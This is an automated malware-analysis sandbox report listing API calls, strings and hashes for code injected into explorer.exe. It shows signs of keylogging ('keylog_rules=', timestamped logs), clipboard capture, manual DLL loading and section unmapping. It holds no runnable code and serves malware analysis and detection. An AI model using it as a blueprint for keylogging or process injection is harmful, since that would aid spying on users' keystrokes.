                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryZero
                                                                                                                            • String ID: G$OG$OG$OG G
                                                                                                                            • API String ID: 816449071-3684225115
                                                                                                                            • Opcode ID: 31839f73adcb72787bb032c66cb2d1658c383810fd48b73d8b39dc77f59e3597
                                                                                                                            • Instruction ID: 57e198ae3363cdcb0562caca596906e57f700eaf6983b78f77aea6a47301d5ee
                                                                                                                            • Opcode Fuzzy Hash: 31839f73adcb72787bb032c66cb2d1658c383810fd48b73d8b39dc77f59e3597
                                                                                                                            • Instruction Fuzzy Hash: 9311E3B1A01209AFDB10DFA9D984ABFB7BDEB48701B104029F949E3240E7749E44DB65

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.NTDLL(0047582C), ref: 00471839
                                                                                                                            • lstrlenW.KERNEL32 ref: 00471845
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(0047582C), ref: 004718A9
                                                                                                                            • Sleep.KERNEL32(00007530), ref: 004718B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                            • String ID: ,XG
                                                                                                                            • API String ID: 2134730579-1422681593
                                                                                                                            • Opcode ID: 364b34ee7368b1f7957a47b10d8fe88c17ee6f0a384e552543fc0330ff87b86d
                                                                                                                            • Instruction ID: c3b96b7d5bff35bb7aca6b337163fd476634f9d9067e12b1351a749014a5afab
                                                                                                                            • Opcode Fuzzy Hash: 364b34ee7368b1f7957a47b10d8fe88c17ee6f0a384e552543fc0330ff87b86d
                                                                                                                            • Instruction Fuzzy Hash: EB01A771A11540ABD3247F76EE1A8AE3AA9EB41705704803EF10D8B261DAB88D41D7AF

                                                                                                                             Control-flow Graph: basic blocks 4712ae-4712bf through 4713a6-4713ad (rendered graph with executed/not-executed colouring not reproduced as text; called APIs are listed under APIs below)
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004729BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,004712D9,00000000,00000000,?,00000001), ref: 004729C7
                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 004712DC
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0047138A
                                                                                                                              • Part of subcall function 00472841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00471119,00000001), ref: 00472850
                                                                                                                              • Part of subcall function 00472841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00471119,00000001), ref: 00472855
                                                                                                                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00471316
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00471332
                                                                                                                              • Part of subcall function 00472569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0047136E), ref: 00472591
                                                                                                                              • Part of subcall function 00472569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0047259A
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0047135F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2993730741-0
                                                                                                                            • Opcode ID: 10c7aaa37ea6af1b696c5ddd530c258339ae7b42b4567bc8cc1166b2de96381c
                                                                                                                            • Instruction ID: c811274904f31d9b13311614b4ffe6a3aa534a88d167d7e73ac7f0bce2f86a01
                                                                                                                            • Opcode Fuzzy Hash: 10c7aaa37ea6af1b696c5ddd530c258339ae7b42b4567bc8cc1166b2de96381c
                                                                                                                            • Instruction Fuzzy Hash: EA21D2707042019F9310EF2D89458BFB3D9AB84704B10853FFC4AD3752DB78DD498A6A
                                                                                                                            APIs
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004715A9
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004715C6
                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004715DC
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00471600
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0047161C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1114890469-0
                                                                                                                            • Opcode ID: 2399493a268d5c54a0d547dc761d5577a40dc859f74ccd151cffadc3b78c0020
                                                                                                                            • Instruction ID: 489620c0566b34ce9a8fe4c86dce780d147c746e10dafc0e22d00b542f504644
                                                                                                                            • Opcode Fuzzy Hash: 2399493a268d5c54a0d547dc761d5577a40dc859f74ccd151cffadc3b78c0020
                                                                                                                            • Instruction Fuzzy Hash: C4014832B000506B86282B7E6E885FF22AD9FC6315708C03BF40F93332DE6C8D02529C
                                                                                                                            APIs
                                                                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00471BF4
                                                                                                                            • LoadLibraryA.KERNEL32(?,00475848,00000000,00000000,76232EE0,00000000,004719B6,?,?,?,00000001,?,00000000), ref: 00471C1C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00471C49
                                                                                                                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00471C9A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3827878703-0
                                                                                                                            • Opcode ID: 1183ffa5ee2a4e4eb9132999b78f8d34a0633f8ca8c389fbe67dc360b27ce6bb
                                                                                                                            • Instruction ID: e54e7f7f7e120955fa95f7628db52f00bb9e0ce31acc969b59eab95bbdffb60e
                                                                                                                            • Opcode Fuzzy Hash: 1183ffa5ee2a4e4eb9132999b78f8d34a0633f8ca8c389fbe67dc360b27ce6bb
                                                                                                                            • Instruction Fuzzy Hash: 7E31C071740211AFCB29CF6DC884BA6B7A8BF15305F14812EE84EC7310D739E845DBA8
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,004711DD), ref: 004726DB
                                                                                                                            • IsWow64Process.KERNEL32(000000FF,?), ref: 004726ED
                                                                                                                            • IsWow64Process.KERNEL32(00000000,?), ref: 00472700
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 331459951-0
                                                                                                                            • Opcode ID: ee0f1da1aa11b798e81a9e115ede4063d819c18f01c4dbe8b90f95d10250b899
                                                                                                                            • Instruction ID: 558b16490ffb54153e39d30cad16443359143961ca309251796b5d52f0c4bbf2
                                                                                                                            • Opcode Fuzzy Hash: ee0f1da1aa11b798e81a9e115ede4063d819c18f01c4dbe8b90f95d10250b899
                                                                                                                            • Instruction Fuzzy Hash: 93F0B471802228FF9B14CFA49F488EFB7BCEF05356B10426BE908A3240D7744F40A6A9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • GetLocalTime.KERNEL32(?,00000000), ref: 004717F3
                                                                                                                            • wsprintfW.USER32 ref: 0047181D
                                                                                                                            Strings
                                                                                                                            • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00471817
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                            • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                            • API String ID: 377395780-613334611
                                                                                                                            • Opcode ID: cf4570bbc77d3d190220f2d36414867e1d03fa0a7faa8834430fc680cd2d4f71
                                                                                                                            • Instruction ID: a3888f7324a23b5431077a5d5f438143a4182e43adab6600a579f09d7d46ed57
                                                                                                                            • Opcode Fuzzy Hash: cf4570bbc77d3d190220f2d36414867e1d03fa0a7faa8834430fc680cd2d4f71
                                                                                                                            • Instruction Fuzzy Hash: 1FF03761900138BAC7145BD99D059FFB3FCEB0C702B00015BFA45E1180F57C5A90D3B9

                                                                                                                             Callgraph: rendered call graph of the Function_00AA1000 .. Function_00AAB4A8 nodes in the 00AA1000 memory dump (executed/not-executed colouring, opacity-by-relevance and disassembly links not reproduced as text)

                                                                                                                             Control-flow Graph: basic blocks aa370c-aa371c through aa37d5-aa37de (rendered graph with executed/not-executed colouring not reproduced as text)
                                                                                                                            APIs
                                                                                                                            • NtUnmapViewOfSection.NTDLL ref: 00AA378C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.4579249904.0000000000AA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_aa1000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498011366-0
                                                                                                                            • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                            • Instruction ID: 051172b8067697a1eca0933bc269406de931c5048cc94f01f91583bd5e4d47a1
                                                                                                                            • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                            • Instruction Fuzzy Hash: 7311B2746019094BFF58FBB8989D27533E1EB1A312F54402AB815C72E2EF398A818700

                                                                                                                             Control-flow Graph: basic blocks aab4a8-aab4ab through aab685-aab694 (rendered graph with executed/not-executed colouring not reproduced as text; LoadLibraryA and VirtualProtect calls are listed under APIs below)
APIs
• LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00AAB5A7
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00AAB651
• VirtualProtect.KERNELBASE ref: 00AAB66F
Memory Dump Source
• Source File: 00000013.00000002.4579249904.0000000000AAA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AAA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_aaa000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
• Instruction ID: 489849b5689ead08a026ee792af1f0160920f9d603f2e9ace04eec1bddc1df85
• Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
• Instruction Fuzzy Hash: EA515B31B74A1E4BCB24AB789CD42F4B7D1F75B325B18062AC49BC32C7D769C84683A1

Control-flow Graph

APIs
  • Part of subcall function 00AA1BF8: OpenFileMappingA.KERNEL32 ref: 00AA1C0F
  • Part of subcall function 00AA1BF8: MapViewOfFile.KERNELBASE ref: 00AA1C2E
• SysFreeMap.PGOCR ref: 00AA36F7
• SleepEx.KERNELBASE ref: 00AA3701
Memory Dump Source
• Source File: 00000013.00000002.4579249904.0000000000AA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_aa1000_explorer.jbxd
Similarity
• API ID: File$FreeMappingOpenSleepView
• String ID:
• API String ID: 4205437007-0
• Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
• Instruction ID: d66d6cc551eaffb990e0ca7ac61f90c67ad2474d9389a1ba0c6e486f669ec878
• Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
• Instruction Fuzzy Hash: D1518431218A089FDB19FF28D9997AB73E2EB96310F444619F45BC72E1DF38DA058781

Control-flow Graph

[rendered graph not recoverable: basic blocks aa1bf8 through aa1c48, with calls to OpenFileMappingA and MapViewOfFile; legend: Executed / Not Executed]
APIs
Memory Dump Source
• Source File: 00000013.00000002.4579249904.0000000000AA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_aa1000_explorer.jbxd
Similarity
• API ID: File$MappingOpenView
• String ID:
• API String ID: 3439327939-0
• Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
• Instruction ID: a08c69f5635d18ec052ff8f6aeebf9bf11abeb5654308294f6c17c05b86cbb7d
• Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
• Instruction Fuzzy Hash: 24F01234314F4D4FAB45EF7C9C9C136B7E1EBA8202B44857A985AC7165EF34C8458711